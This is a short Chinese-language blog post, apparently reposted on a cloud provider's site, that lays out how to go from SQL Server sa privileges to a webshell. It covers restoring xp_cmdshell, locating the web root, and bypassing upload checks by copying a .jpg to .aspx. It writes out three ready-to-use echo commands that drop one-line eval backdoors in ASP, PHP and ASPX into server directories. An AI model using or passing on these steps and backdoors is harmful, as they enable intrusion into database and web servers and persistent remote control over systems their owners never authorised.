溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
獲取短信驗證碼
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
登 錄 注冊有禮
云服務器 香港服務器 高防服務器
最新更新 網站標簽 地圖導航
產品

sa權限獲取webshell思路

發布時間:2020-07-02 00:53:49 來源:網絡 閱讀:4695 作者:simeon2005 欄目:安全技術

sa權限獲取webshell思路

   1.通過SQL查詢分析器通過sa權限首先恢復xp_cmdshell存儲過程。

   2.通過SQL Tools2.0連接數據庫,執行命令,查看網站路徑以及磁盤文件,獲取網站的真實路徑。

   3.echo生成一句話后門。

   4.直接獲取webshell權限。

   5.如果echo生成的一句話后門無法執行,可以通過查看對應網站的數據庫,獲取后臺登陸密碼,通過后臺上傳webshelljpg。然后通過copy命令將jgp文件復制為aspx文件,從而獲取webshell。

技巧:

   1.尋找可寫的文件夾,例如c:/windows/temp,以及網站的真實路勁。


   2.通過echo命令生成一句話后門

  echo ^<%eval request(cmd)% ^>^>d:\wwwroot\ok.asp

  echo ^<?php @eval($_POST[cmd]);?^>^>cmd.php

  echo ^<%@ PageLanguage="Jscript%"^>^<^%eval(Request.Item["pass"],"unsafe");%^>^>c:\inetpub\wwwroot\cmd.aspx


向AI問一下細節
推薦閱讀:
  1. PhpMyadmin是如何利用Mysql root密碼獲取webshell的
  2. TinyShop緩存文件獲取WebShell之0day

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

sa we 權限獲取

猜你喜歡

最新資訊
相關推薦

相關標簽

win7 trustedinstaller we sa unset 制冷 正方形 練習實例 python mysql microsoft speech pla zend opcache ob緩存 日志監控 mysql數組 wp typeof 鼠標事件 自學軟件測試 archetype vlan劃分
AI

產品服務
地區劃分
專題活動
幫助支持
關于我們
售后咨詢
7*24小時在線電話:400-100-2938
7*24小時在線 QQ:800811969
關注億速云

億速云公眾號

手機網站二維碼

Copyright ? Yisu Cloud Ltd. All Rights Reserved. 2018 版權所有

廣州億速云計算有限公司粵ICP備17096448號-1 粵公網安備 44010402001142號增值電信業務經營許可證編號:B1-20181529

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女